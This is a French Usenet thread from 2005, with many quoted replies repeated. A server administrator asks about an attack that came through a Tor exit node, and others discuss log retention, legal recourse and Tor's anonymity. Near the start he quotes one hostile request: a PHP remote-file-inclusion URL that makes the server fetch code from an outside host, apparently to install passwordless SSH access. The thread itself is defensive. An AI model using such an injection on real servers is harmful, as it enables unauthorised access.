récemment, une personne sans doute mal intentionnée a cherché à attaquer
un serveur web que j'administre. (Serveur sous Linux, bien à jour,
firewallé et tout ce qui s'en suit).
Les attaques vers les serveurs internet sont choses courantes, j'en
enregistre (vive Snort) plus de mille par jour, souvent de simples scans
nmap ou des attaques de machines infestées par des vers, et cetera. Rien
d'alarmant en somme.
Cette fois l'attaque en question a consisté à faire un full scan des
ports ouverts, de quelques tests de vulnérabilité sur les ports smtp,
dns, pop et http, et enfin, d'une tentative d'injection de code PHP sur
une des pages, du genre passage de paramètres comme :
popup.php?page=http://scriptkiddieland.com/install_passwordless_ssh.txt
Cela signifie je pense que l'attaquant en question connaissait le site
web qu'héberge ce serveur (ou s'y est vraiment interessé de près) et n'a
pas juste attaqué une IP au hasard.
Habituellement, quand je remarque une telle attaque, je regarde la
localisation de l'ip et la compare avec celles de mes bases de données,
pour essayer d'identifier la personne mal intentionnée et éventuellement
lui remonter les bretelles si je dispose de son mail, etc.
Cette fois, l'ip correspondait à un serveur hébergé à l'université
d'Harvard, en me rendant sur le site j'ai pu facilement trouver l'email
de l'admin de la machine, et lui ai demandé poliment de vérifier que sa
machine n'était pas trouée et de faire le nécessaire pour que l'on
n'attaque plus mon serveur à partir de son IP.
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me
donner l'identité de l'attaquant ni même une IP, pour la simple raison
que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment
un anonymiseur TCP qui sert justement à empecher que l'on remonte à
l'IP d'origine d'une connexion. sic .
Voilà, désolé pour le résumé un peu long, voici les questions que je me
pose :
- Est il vraiment utile de garder les IPs utilisées lors des
attaques "sérieuses" que subit un serveur, ou est ce complètement vain
- Au cas où une attaque réussirait et qu'un serveur serait
rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker
peut elle m'être utile pour espérer un dedomagement
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour
attaquer n'importe qui en toute impunité et avec les pires vilainies qui
soient non? C'est légal?
- Si une attaque à partir de ce réseau TOR fini par faire tomber
un serveur, qui dois-je considérer comme responsable ?
- Est il vraiment utile de garder les IPs utilisées lors des attaques "sérieuses" que subit un serveur, ou est ce complètement vain
pour une attaque serieuse de ce genre je dirai oui. Ca permet d'intenter une action en justice.
- Au cas où une attaque réussirait et qu'un serveur serait rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker peut elle m'être utile pour espérer un dedomagement
ca depend, si ledit hacker est en europe, il y a une chance (encore faut il qu'il ait des sous pour dedommager), sinon bof. En revanche au penal le hacker peut s'en prendre plein la tronche.
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour attaquer n'importe qui en toute impunité et avec les pires vilainies qui soient non? C'est légal?
oui parce qu'en fait ce n'est pas un anonymiseur complet. Ca anonymise depuis l'exterieur du reseau et chaque serveur du reseau ne peut pas savoir qui fait une requete (d'ou la reponse de l'admin). En revanche si qqn a acces a tous les serveurs il peut retrouver l'origine de la requete, donc une enquete judiciaire aboutira. voir http://tor.eff.org
- Si une attaque à partir de ce réseau TOR fini par faire tomber un serveur, qui dois-je considérer comme responsable ?
la personne qui conduit l'attaque et personne d'autre.
Merci de votre attention! de rien
On 2005-03-11, J1 <ji1.NOJUNK@free.fr> wrote:
Bonjour,
- Est il vraiment utile de garder les IPs utilisées lors des
attaques "sérieuses" que subit un serveur, ou est ce complètement vain
pour une attaque serieuse de ce genre je dirai oui. Ca permet d'intenter
une action en justice.
- Au cas où une attaque réussirait et qu'un serveur serait
rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker
peut elle m'être utile pour espérer un dedomagement
ca depend, si ledit hacker est en europe, il y a une chance (encore faut
il qu'il ait des sous pour dedommager), sinon bof. En revanche au penal
le hacker peut s'en prendre plein la tronche.
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour
attaquer n'importe qui en toute impunité et avec les pires vilainies qui
soient non? C'est légal?
oui parce qu'en fait ce n'est pas un anonymiseur complet. Ca anonymise
depuis l'exterieur du reseau et chaque serveur du reseau ne peut pas
savoir qui fait une requete (d'ou la reponse de l'admin). En revanche si
qqn a acces a tous les serveurs il peut retrouver l'origine de la
requete, donc une enquete judiciaire aboutira.
voir http://tor.eff.org
- Si une attaque à partir de ce réseau TOR fini par faire tomber
un serveur, qui dois-je considérer comme responsable ?
la personne qui conduit l'attaque et personne d'autre.
- Est il vraiment utile de garder les IPs utilisées lors des attaques "sérieuses" que subit un serveur, ou est ce complètement vain
pour une attaque serieuse de ce genre je dirai oui. Ca permet d'intenter une action en justice.
- Au cas où une attaque réussirait et qu'un serveur serait rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker peut elle m'être utile pour espérer un dedomagement
ca depend, si ledit hacker est en europe, il y a une chance (encore faut il qu'il ait des sous pour dedommager), sinon bof. En revanche au penal le hacker peut s'en prendre plein la tronche.
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour attaquer n'importe qui en toute impunité et avec les pires vilainies qui soient non? C'est légal?
oui parce qu'en fait ce n'est pas un anonymiseur complet. Ca anonymise depuis l'exterieur du reseau et chaque serveur du reseau ne peut pas savoir qui fait une requete (d'ou la reponse de l'admin). En revanche si qqn a acces a tous les serveurs il peut retrouver l'origine de la requete, donc une enquete judiciaire aboutira. voir http://tor.eff.org
- Si une attaque à partir de ce réseau TOR fini par faire tomber un serveur, qui dois-je considérer comme responsable ?
la personne qui conduit l'attaque et personne d'autre.
Merci de votre attention! de rien
HelloMan
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me donner l'identité de l'attaquant ni même une IP, pour la simple raison que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment un anonymiseur TCP qui sert justement à empecher que l'on remonte à l'IP d'origine d'une connexion. sic .
Peux tu joindre la réponse de ce gars dans le forum, de façon anonyme, pas de nom ni de ip en clair.
Voilà, désolé pour le résumé un peu long, voici les questions que je me pose :
Nononon, pour une fois que l'on a du vraiment concret à se mettre sous la dent ici...
- Est il vraiment utile de garder les IPs utilisées lors des attaques "sérieuses" que subit un serveur, ou est ce complètement vain
Oui, toujours, moi j'ai des logs d'attaques datant de plusieurs années.... très intéressant pour faire des recoupements. Ca peut toujours servir. Conserve tout de façon brute ET de façon filtrée sur l'attaquant.
- Au cas où une attaque réussirait et qu'un serveur serait rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker peut elle m'être utile pour espérer un dedomagement
Un dédomagement, là franchement je ne crois pas. Pour qu'il y ait dédomagement, il faut qu'il y ait plainte auprès d'une juridiction, et jugement, pour qu'il y ait jugement, il faut qu'il y ait préjudice, CAD manque à gagner.
Enfin, c'est toujours possible, mais tu as intérêt à assurer tes arrières avant de lancer une procédure; si j'ai bien compris, tu as affaire à un gars anonymisé derrière un réseau universitaire; c'est à dire que tout ce que tu as à te mettre sous la dent, c'est l'université de Harvard, rien que ça, achtung baby.
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour attaquer n'importe qui en toute impunité et avec les pires vilainies qui soient non? C'est légal?
- Si une attaque à partir de ce réseau TOR fini par faire tomber un serveur, qui dois-je considérer comme responsable ?
Sais pô. Le réseau TOR aura vite fait de se laver les mains, juridiquement (c'est pas moi, c'est lui), malgré que son existence en elle même soit potentiellement discutable.
Cependant, si tu dispose d'une IP, tu peux tenter un whois dessus, tu auras alors un email pour le responsable du abuse. D'après ce que tu décris, tu l'as déjà exploité pour lui signaler le problème.
Si il s'agit bien d'un réseau universitaire, tu auras également un numéro de téléphone, j'ai déjà été confronté à un cas similaire, je n'ai pas hésité à appeler, crois moi, cela fait son petit effet.
Tu peux également via l'adresse donnée par le whois envoyer un courrier postal, en recommandé éventuellement avec AR. Cela fait des frais, mais s'il y a une notion de préjudice pour toi, c'est qu'il y a manque à gagner, je ne pense pas que tu puisse jamais obtenir de dédomagements face à Harvard, outre le fait qu'ils ne sont peut être même pas responsables, c'est également l'une des meilleures facs de droit des Etats-Unis. Donc les frais d'un recommandé AR internationnal couvriront peut-Etre le manque à gagner que tu subis, et feront surement réagir quelqu'un là bas.
Un cas très intéressant de toute façons.
Dis nous comment cela évolue
@+
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me
donner l'identité de l'attaquant ni même une IP, pour la simple raison
que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment
un anonymiseur TCP qui sert justement à empecher que l'on remonte à
l'IP d'origine d'une connexion. sic .
Peux tu joindre la réponse de ce gars dans le forum, de façon anonyme, pas
de nom ni de ip en clair.
Voilà, désolé pour le résumé un peu long, voici les questions que je me
pose :
Nononon, pour une fois que l'on a du vraiment concret à se mettre sous la
dent ici...
- Est il vraiment utile de garder les IPs utilisées lors des
attaques "sérieuses" que subit un serveur, ou est ce complètement vain
Oui, toujours, moi j'ai des logs d'attaques datant de plusieurs années....
très intéressant pour faire des recoupements. Ca peut toujours servir.
Conserve tout de façon brute ET de façon filtrée sur l'attaquant.
- Au cas où une attaque réussirait et qu'un serveur serait
rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker
peut elle m'être utile pour espérer un dedomagement
Un dédomagement, là franchement je ne crois pas. Pour qu'il y ait
dédomagement, il faut qu'il y ait plainte auprès d'une juridiction, et
jugement, pour qu'il y ait jugement, il faut qu'il y ait préjudice, CAD
manque à gagner.
Enfin, c'est toujours possible, mais tu as intérêt à assurer tes arrières
avant de lancer une procédure; si j'ai bien compris, tu as affaire à un
gars anonymisé derrière un réseau universitaire; c'est à dire que tout ce
que tu as à te mettre sous la dent, c'est l'université de Harvard, rien que
ça, achtung baby.
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour
attaquer n'importe qui en toute impunité et avec les pires vilainies qui
soient non? C'est légal?
- Si une attaque à partir de ce réseau TOR fini par faire tomber
un serveur, qui dois-je considérer comme responsable ?
Sais pô. Le réseau TOR aura vite fait de se laver les mains, juridiquement
(c'est pas moi, c'est lui), malgré que son existence en elle même soit
potentiellement discutable.
Cependant, si tu dispose d'une IP, tu peux tenter un whois dessus, tu auras
alors un email pour le responsable du abuse. D'après ce que tu décris, tu
l'as déjà exploité pour lui signaler le problème.
Si il s'agit bien d'un réseau universitaire, tu auras également un numéro de
téléphone, j'ai déjà été confronté à un cas similaire, je n'ai pas hésité à
appeler, crois moi, cela fait son petit effet.
Tu peux également via l'adresse donnée par le whois envoyer un courrier
postal, en recommandé éventuellement avec AR. Cela fait des frais, mais
s'il y a une notion de préjudice pour toi, c'est qu'il y a manque à gagner,
je ne pense pas que tu puisse jamais obtenir de dédomagements face à
Harvard, outre le fait qu'ils ne sont peut être même pas responsables,
c'est également l'une des meilleures facs de droit des Etats-Unis. Donc les
frais d'un recommandé AR internationnal couvriront peut-Etre le manque à
gagner que tu subis, et feront surement réagir quelqu'un là bas.
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me donner l'identité de l'attaquant ni même une IP, pour la simple raison que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment un anonymiseur TCP qui sert justement à empecher que l'on remonte à l'IP d'origine d'une connexion. sic .
Peux tu joindre la réponse de ce gars dans le forum, de façon anonyme, pas de nom ni de ip en clair.
Voilà, désolé pour le résumé un peu long, voici les questions que je me pose :
Nononon, pour une fois que l'on a du vraiment concret à se mettre sous la dent ici...
- Est il vraiment utile de garder les IPs utilisées lors des attaques "sérieuses" que subit un serveur, ou est ce complètement vain
Oui, toujours, moi j'ai des logs d'attaques datant de plusieurs années.... très intéressant pour faire des recoupements. Ca peut toujours servir. Conserve tout de façon brute ET de façon filtrée sur l'attaquant.
- Au cas où une attaque réussirait et qu'un serveur serait rootkité puis utilisé à des fins peu louables, l'adresse IP du hacker peut elle m'être utile pour espérer un dedomagement
Un dédomagement, là franchement je ne crois pas. Pour qu'il y ait dédomagement, il faut qu'il y ait plainte auprès d'une juridiction, et jugement, pour qu'il y ait jugement, il faut qu'il y ait préjudice, CAD manque à gagner.
Enfin, c'est toujours possible, mais tu as intérêt à assurer tes arrières avant de lancer une procédure; si j'ai bien compris, tu as affaire à un gars anonymisé derrière un réseau universitaire; c'est à dire que tout ce que tu as à te mettre sous la dent, c'est l'université de Harvard, rien que ça, achtung baby.
- Ce réseau d'anonymiseur TOR , c'est le système rêvé pour attaquer n'importe qui en toute impunité et avec les pires vilainies qui soient non? C'est légal?
- Si une attaque à partir de ce réseau TOR fini par faire tomber un serveur, qui dois-je considérer comme responsable ?
Sais pô. Le réseau TOR aura vite fait de se laver les mains, juridiquement (c'est pas moi, c'est lui), malgré que son existence en elle même soit potentiellement discutable.
Cependant, si tu dispose d'une IP, tu peux tenter un whois dessus, tu auras alors un email pour le responsable du abuse. D'après ce que tu décris, tu l'as déjà exploité pour lui signaler le problème.
Si il s'agit bien d'un réseau universitaire, tu auras également un numéro de téléphone, j'ai déjà été confronté à un cas similaire, je n'ai pas hésité à appeler, crois moi, cela fait son petit effet.
Tu peux également via l'adresse donnée par le whois envoyer un courrier postal, en recommandé éventuellement avec AR. Cela fait des frais, mais s'il y a une notion de préjudice pour toi, c'est qu'il y a manque à gagner, je ne pense pas que tu puisse jamais obtenir de dédomagements face à Harvard, outre le fait qu'ils ne sont peut être même pas responsables, c'est également l'une des meilleures facs de droit des Etats-Unis. Donc les frais d'un recommandé AR internationnal couvriront peut-Etre le manque à gagner que tu subis, et feront surement réagir quelqu'un là bas.
Un cas très intéressant de toute façons.
Dis nous comment cela évolue
@+
J1
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me donner l'identité de l'attaquant ni même une IP, pour la simple raison que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment un anonymiseur TCP qui sert justement à empecher que l'on remonte à l'IP d'origine d'une connexion. sic .
Peux tu joindre la réponse de ce gars dans le forum, de façon anonyme, pas de nom ni de ip en clair.
Pas de problème, par contre, evidemment, c'est en anglais :
*******Mail reçu :********
On Mon, Mar 07, 2005 at 10:15:40AM +0100, (ici, mon nom) wrote:
we noticed a few PHP attack on our web server (XXX.XXX.XXX.XXX) this week end, and those attacks came from the IP address YYY.YYY.YYY.YYY ZZZZZZ.ZZZZ.harvard.edu ), which seems to be your server.
I do indeed administer ZZZZZZ.ZZZZ.harvard.edu, which serves as a Tor exit node.
I know nothing of these attacks, and as far as I can tell, ZZZZZZ.ZZZZ.harvard.edu is not compromised. I conclude that all attacks on your web server appearing to originate from ZZZZZZ.ZZZZ.harvard.edu are actually originating from the Tor network.
Please do the necessary in order to stop those hacking attempts. I guess someone with bad intentions used your TOR service to attack our server ; we would like to have the IP of this hacker.
This conclusion seems likely.
Tor is an anonymity system designed to separate routing information from identity. Even if I were to log all connections through Tor, which I do not, I would at best be able to provide the IP address of the previous Tor router in the chain, not the originating IP address. This is by design; if I could provide routing information for the origin of the datagram, then Tor would be broken. For more information, please refer to the following URL.
http://tor.eff.org/
As an advice, i would suggest you to filter access to the services on your servers (i noticed that http://YYY.YYY.YYY.YYY:PPPP was available from wwweb).
I appreciate your concern, but this service and others are intended to be publically available. (Though please let me know if you know of something that allows arbitrary command execution.)
Cheers,
*******Fin du mail********
-- J1
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me
donner l'identité de l'attaquant ni même une IP, pour la simple raison
que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment
un anonymiseur TCP qui sert justement à empecher que l'on remonte à
l'IP d'origine d'une connexion. sic .
Peux tu joindre la réponse de ce gars dans le forum, de façon anonyme, pas
de nom ni de ip en clair.
Pas de problème, par contre, evidemment, c'est en anglais :
*******Mail reçu :********
On Mon, Mar 07, 2005 at 10:15:40AM +0100, (ici, mon nom) wrote:
we noticed a few PHP attack on our web server (XXX.XXX.XXX.XXX) this
week end, and those attacks came from the IP address YYY.YYY.YYY.YYY
ZZZZZZ.ZZZZ.harvard.edu ), which seems to be your server.
I do indeed administer ZZZZZZ.ZZZZ.harvard.edu, which serves as a Tor
exit node.
I know nothing of these attacks, and as far as I can tell,
ZZZZZZ.ZZZZ.harvard.edu is not compromised. I conclude that all
attacks on your web server appearing to originate from
ZZZZZZ.ZZZZ.harvard.edu are actually originating from the Tor network.
Please do the necessary in order to stop those hacking attempts.
I guess someone with bad intentions used your TOR service to attack our
server ; we would like to have the IP of this hacker.
This conclusion seems likely.
Tor is an anonymity system designed to separate routing information from
identity. Even if I were to log all connections through Tor, which I do
not, I would at best be able to provide the IP address of the previous
Tor router in the chain, not the originating IP address. This is by
design; if I could provide routing information for the origin of the
datagram, then Tor would be broken. For more information, please refer
to the following URL.
http://tor.eff.org/
As an advice, i would suggest you to filter access to the services on
your servers (i noticed that http://YYY.YYY.YYY.YYY:PPPP was available
from wwweb).
I appreciate your concern, but this service and others are intended to
be publically available. (Though please let me know if you know of
something that allows arbitrary command execution.)
Sa réponse ne manque pas d'éloquance, il m'explique qu'il ne peut pas me donner l'identité de l'attaquant ni même une IP, pour la simple raison que sa machine est un noeud 'exit' d'un réseau TOR, qui est apparemment un anonymiseur TCP qui sert justement à empecher que l'on remonte à l'IP d'origine d'une connexion. sic .
Peux tu joindre la réponse de ce gars dans le forum, de façon anonyme, pas de nom ni de ip en clair.
Pas de problème, par contre, evidemment, c'est en anglais :
*******Mail reçu :********
On Mon, Mar 07, 2005 at 10:15:40AM +0100, (ici, mon nom) wrote:
we noticed a few PHP attack on our web server (XXX.XXX.XXX.XXX) this week end, and those attacks came from the IP address YYY.YYY.YYY.YYY ZZZZZZ.ZZZZ.harvard.edu ), which seems to be your server.
I do indeed administer ZZZZZZ.ZZZZ.harvard.edu, which serves as a Tor exit node.
I know nothing of these attacks, and as far as I can tell, ZZZZZZ.ZZZZ.harvard.edu is not compromised. I conclude that all attacks on your web server appearing to originate from ZZZZZZ.ZZZZ.harvard.edu are actually originating from the Tor network.
Please do the necessary in order to stop those hacking attempts. I guess someone with bad intentions used your TOR service to attack our server ; we would like to have the IP of this hacker.
This conclusion seems likely.
Tor is an anonymity system designed to separate routing information from identity. Even if I were to log all connections through Tor, which I do not, I would at best be able to provide the IP address of the previous Tor router in the chain, not the originating IP address. This is by design; if I could provide routing information for the origin of the datagram, then Tor would be broken. For more information, please refer to the following URL.
http://tor.eff.org/
As an advice, i would suggest you to filter access to the services on your servers (i noticed that http://YYY.YYY.YYY.YYY:PPPP was available from wwweb).
I appreciate your concern, but this service and others are intended to be publically available. (Though please let me know if you know of something that allows arbitrary command execution.)
Cheers,
*******Fin du mail********
-- J1
J1
- Si une attaque à partir de ce réseau TOR fini par faire tomber un serveur, qui dois-je considérer comme responsable ?
la personne qui conduit l'attaque et personne d'autre.
Voila où ce situe le problème : la personne qui a mené l'attaque depuis ce réseau TOR ne sera en pratique jamais inquiétée, dans la mesure où de toute façon, le temps qu'une procédure judiciaire (que je n'intenterai pas vu que l'attaque a été vaine), il n'y aura AMHA plus de traces des connexions correspondant à l'attaque dans les logs de leur réseau.
De plus, l'admin de la machine correspondant à l'IP qui a servi à attaquer mon serveur se targue sur sa page perso d'être un "hacktivist". Rien ne me prouve à l'heure actuelle que l'attaque provenait réellement du réseau TOR!
Dans cette logique, il devient facile, en s'inscrivant comme noeud "exit" du réseau TOR, de pratiquer du hacking depuis la maison sans risque et sans avoir à rechercher / utiliser de passerelle pour se couvrir...
-- J1
- Si une attaque à partir de ce réseau TOR fini par faire tomber
un serveur, qui dois-je considérer comme responsable ?
la personne qui conduit l'attaque et personne d'autre.
Voila où ce situe le problème : la personne qui a mené l'attaque depuis
ce réseau TOR ne sera en pratique jamais inquiétée, dans la mesure où de
toute façon, le temps qu'une procédure judiciaire (que je n'intenterai
pas vu que l'attaque a été vaine), il n'y aura AMHA plus de traces des
connexions correspondant à l'attaque dans les logs de leur réseau.
De plus, l'admin de la machine correspondant à l'IP qui a servi à
attaquer mon serveur se targue sur sa page perso d'être un "hacktivist".
Rien ne me prouve à l'heure actuelle que l'attaque provenait réellement
du réseau TOR!
Dans cette logique, il devient facile, en s'inscrivant comme noeud
"exit" du réseau TOR, de pratiquer du hacking depuis la maison sans
risque et sans avoir à rechercher / utiliser de passerelle pour
se couvrir...
- Si une attaque à partir de ce réseau TOR fini par faire tomber un serveur, qui dois-je considérer comme responsable ?
la personne qui conduit l'attaque et personne d'autre.
Voila où ce situe le problème : la personne qui a mené l'attaque depuis ce réseau TOR ne sera en pratique jamais inquiétée, dans la mesure où de toute façon, le temps qu'une procédure judiciaire (que je n'intenterai pas vu que l'attaque a été vaine), il n'y aura AMHA plus de traces des connexions correspondant à l'attaque dans les logs de leur réseau.
De plus, l'admin de la machine correspondant à l'IP qui a servi à attaquer mon serveur se targue sur sa page perso d'être un "hacktivist". Rien ne me prouve à l'heure actuelle que l'attaque provenait réellement du réseau TOR!
Dans cette logique, il devient facile, en s'inscrivant comme noeud "exit" du réseau TOR, de pratiquer du hacking depuis la maison sans risque et sans avoir à rechercher / utiliser de passerelle pour se couvrir...
-- J1
Cedric Blancher
Le Mon, 14 Mar 2005 10:42:09 +0000, J1 a écrit :
la personne qui a mené l'attaque depuis ce réseau TOR [...]
il n'y aura AMHA plus de traces des connexions correspondant à l'attaque dans les logs de leur réseau.
Le réseau TOR ne tient pas de logs, c'est le principe de la chose que de rendre la backtrace impossible.
--
De toutes facons emacs c'est une surcouche du système d'exploitation, donc normalement il devrait rebooter autant que l'ordinateur. moi, emacs, je l'ai bouté ... hors de ma linuxette
-+- MS in Guide du Fmblien Assassin : "On m'appelle Jeanne d'Arc." -+-
Le Mon, 14 Mar 2005 10:42:09 +0000, J1 a écrit :
la personne qui a mené l'attaque depuis ce réseau TOR
[...]
il n'y aura AMHA plus de traces des connexions correspondant à
l'attaque dans les logs de leur réseau.
Le réseau TOR ne tient pas de logs, c'est le principe de la chose que de
rendre la backtrace impossible.
--
De toutes facons emacs c'est une surcouche du système d'exploitation,
donc normalement il devrait rebooter autant que l'ordinateur.
moi, emacs, je l'ai bouté ... hors de ma linuxette
-+- MS in Guide du Fmblien Assassin : "On m'appelle Jeanne d'Arc." -+-
la personne qui a mené l'attaque depuis ce réseau TOR [...]
il n'y aura AMHA plus de traces des connexions correspondant à l'attaque dans les logs de leur réseau.
Le réseau TOR ne tient pas de logs, c'est le principe de la chose que de rendre la backtrace impossible.
--
De toutes facons emacs c'est une surcouche du système d'exploitation, donc normalement il devrait rebooter autant que l'ordinateur. moi, emacs, je l'ai bouté ... hors de ma linuxette
-+- MS in Guide du Fmblien Assassin : "On m'appelle Jeanne d'Arc." -+-
J1
la personne qui a mené l'attaque depuis ce réseau TOR
[...]
il n'y aura AMHA plus de traces des connexions correspondant à l'attaque dans les logs de leur réseau.
Le réseau TOR ne tient pas de logs, c'est le principe de la chose que de rendre la backtrace impossible.
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
Je pensais que les fournisseurs d'accès étaient tenus de conserver les logs des connexions pendant un certain temps (plutot long) afin que les poursuites en justice puissent aboutir en cas de préjudice.
Le réseau TOR n'est pas soumis à cette règle ou simplement n'existe t elle pas?
-- J1
la personne qui a mené l'attaque depuis ce réseau TOR
[...]
il n'y aura AMHA plus de traces des connexions correspondant à
l'attaque dans les logs de leur réseau.
Le réseau TOR ne tient pas de logs, c'est le principe de la chose que de
rendre la backtrace impossible.
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal
pour effectuer des attaques sur le net sans qu'il soit *possible* d'être
inquiété...
Je pensais que les fournisseurs d'accès étaient tenus de conserver
les logs des connexions pendant un certain temps (plutot long) afin
que les poursuites en justice puissent aboutir en cas de préjudice.
Le réseau TOR n'est pas soumis à cette règle ou simplement n'existe t
elle pas?
la personne qui a mené l'attaque depuis ce réseau TOR
[...]
il n'y aura AMHA plus de traces des connexions correspondant à l'attaque dans les logs de leur réseau.
Le réseau TOR ne tient pas de logs, c'est le principe de la chose que de rendre la backtrace impossible.
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
Je pensais que les fournisseurs d'accès étaient tenus de conserver les logs des connexions pendant un certain temps (plutot long) afin que les poursuites en justice puissent aboutir en cas de préjudice.
Le réseau TOR n'est pas soumis à cette règle ou simplement n'existe t elle pas?
-- J1
Cedric Blancher
Le Mon, 14 Mar 2005 11:45:03 +0000, J1 a écrit :
Le réseau TOR ne tient pas de logs Voilà exactement ce que je craignais : TOR serait bien l'outil idéal
pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
C'est un outil anonymisant au même titre que pleins d'autres, et peut servir, au même titre, à effectuer des actions douteuses.
[conservation des logs pour les FAI]
Le réseau TOR n'est pas soumis à cette règle ou simplement n'existe t elle pas?
TOR ne fournit pas d'accès. TOR est un outil et n'est donc pas (à mon sens) soumis à ce genre de considération. Mais ceci dit, mettons nous à la place de l'admin d'un noeud de sortie TOR ayant servi à relayer une attaque. Tu portes plainte, tes logs (pour autant qu'ils soient recevables) amènent les enquêteurs jusqu'à ce type. Étant responsable de sa machine et de son accès, et en outre dans l'impossibilité de fournir à la justice les pièces permettant de remonter jusqu'au pirate, il va prendre pour lui.
Personnellement, je trouve qu'on prend, sur la plan purement juridique, pas mal de risque à héberger des noeuds de sortie de systèmes anonymisant efficaces (TOR, Mixmaster, etc.).
-- SP: Ben il met une icône à la Poubelle, croyant y mettre une appli alors qu'en fait il y met tout un dossier. Non ? GG: (...) c'est pas plutôt il désinstalle(...)ta partition complète ? -+- GG in Guide du Macounet Pervers : OSX, OS 8.5 même combat? -+-
Le Mon, 14 Mar 2005 11:45:03 +0000, J1 a écrit :
Le réseau TOR ne tient pas de logs
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal
pour effectuer des attaques sur le net sans qu'il soit *possible* d'être
inquiété...
C'est un outil anonymisant au même titre que pleins d'autres, et peut
servir, au même titre, à effectuer des actions douteuses.
[conservation des logs pour les FAI]
Le réseau TOR n'est pas soumis à cette règle ou simplement n'existe t
elle pas?
TOR ne fournit pas d'accès. TOR est un outil et n'est donc pas (à mon
sens) soumis à ce genre de considération. Mais ceci dit, mettons nous à
la place de l'admin d'un noeud de sortie TOR ayant servi à relayer une
attaque. Tu portes plainte, tes logs (pour autant qu'ils soient
recevables) amènent les enquêteurs jusqu'à ce type. Étant responsable
de sa machine et de son accès, et en outre dans l'impossibilité de
fournir à la justice les pièces permettant de remonter jusqu'au pirate,
il va prendre pour lui.
Personnellement, je trouve qu'on prend, sur la plan purement juridique,
pas mal de risque à héberger des noeuds de sortie de systèmes
anonymisant efficaces (TOR, Mixmaster, etc.).
--
SP: Ben il met une icône à la Poubelle, croyant y mettre une appli alors
qu'en fait il y met tout un dossier. Non ?
GG: (...) c'est pas plutôt il désinstalle(...)ta partition complète ?
-+- GG in Guide du Macounet Pervers : OSX, OS 8.5 même combat? -+-
Le réseau TOR ne tient pas de logs Voilà exactement ce que je craignais : TOR serait bien l'outil idéal
pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
C'est un outil anonymisant au même titre que pleins d'autres, et peut servir, au même titre, à effectuer des actions douteuses.
[conservation des logs pour les FAI]
Le réseau TOR n'est pas soumis à cette règle ou simplement n'existe t elle pas?
TOR ne fournit pas d'accès. TOR est un outil et n'est donc pas (à mon sens) soumis à ce genre de considération. Mais ceci dit, mettons nous à la place de l'admin d'un noeud de sortie TOR ayant servi à relayer une attaque. Tu portes plainte, tes logs (pour autant qu'ils soient recevables) amènent les enquêteurs jusqu'à ce type. Étant responsable de sa machine et de son accès, et en outre dans l'impossibilité de fournir à la justice les pièces permettant de remonter jusqu'au pirate, il va prendre pour lui.
Personnellement, je trouve qu'on prend, sur la plan purement juridique, pas mal de risque à héberger des noeuds de sortie de systèmes anonymisant efficaces (TOR, Mixmaster, etc.).
-- SP: Ben il met une icône à la Poubelle, croyant y mettre une appli alors qu'en fait il y met tout un dossier. Non ? GG: (...) c'est pas plutôt il désinstalle(...)ta partition complète ? -+- GG in Guide du Macounet Pervers : OSX, OS 8.5 même combat? -+-
Fabien LE LEZ
On 14 Mar 2005 11:45:03 GMT, J1 :
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
Y'a pas moyen d'envisager que le blocage des adresses IP correspondantes soient blacklistées par défaut sous Linux ?
-- ;-)
On 14 Mar 2005 11:45:03 GMT, J1 <ji1.NOJUNK@free.fr>:
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal
pour effectuer des attaques sur le net sans qu'il soit *possible* d'être
inquiété...
Y'a pas moyen d'envisager que le blocage des adresses IP
correspondantes soient blacklistées par défaut sous Linux ?
Voilà exactement ce que je craignais : TOR serait bien l'outil idéal pour effectuer des attaques sur le net sans qu'il soit *possible* d'être inquiété...
Y'a pas moyen d'envisager que le blocage des adresses IP correspondantes soient blacklistées par défaut sous Linux ?
-- ;-)
Cedric Blancher
Le Mon, 14 Mar 2005 12:01:31 +0000, Fabien LE LEZ a écrit :
Y'a pas moyen d'envisager que le blocage des adresses IP correspondantes soient blacklistées par défaut sous Linux ?
Y'a moyen de l'envisager en effet si on arrive à trouver une liste des tous les noeud de sortie TOR. Mais pourquoi le mettre par défaut sous Linux ???
-- Il est évident que nombre de sites sont censuré à l'inssue de l'utilisateur. Il existe une "black liste" de site chez les fournisseurs et ils font de la sensure sans en avertir les internautes. -+- DM in : Guide du Neuneu d'Usenet - FAI sournois avec le neuneu -+-
Le Mon, 14 Mar 2005 12:01:31 +0000, Fabien LE LEZ a écrit :
Y'a pas moyen d'envisager que le blocage des adresses IP
correspondantes soient blacklistées par défaut sous Linux ?
Y'a moyen de l'envisager en effet si on arrive à trouver une liste des
tous les noeud de sortie TOR. Mais pourquoi le mettre par défaut sous
Linux ???
--
Il est évident que nombre de sites sont censuré à l'inssue de
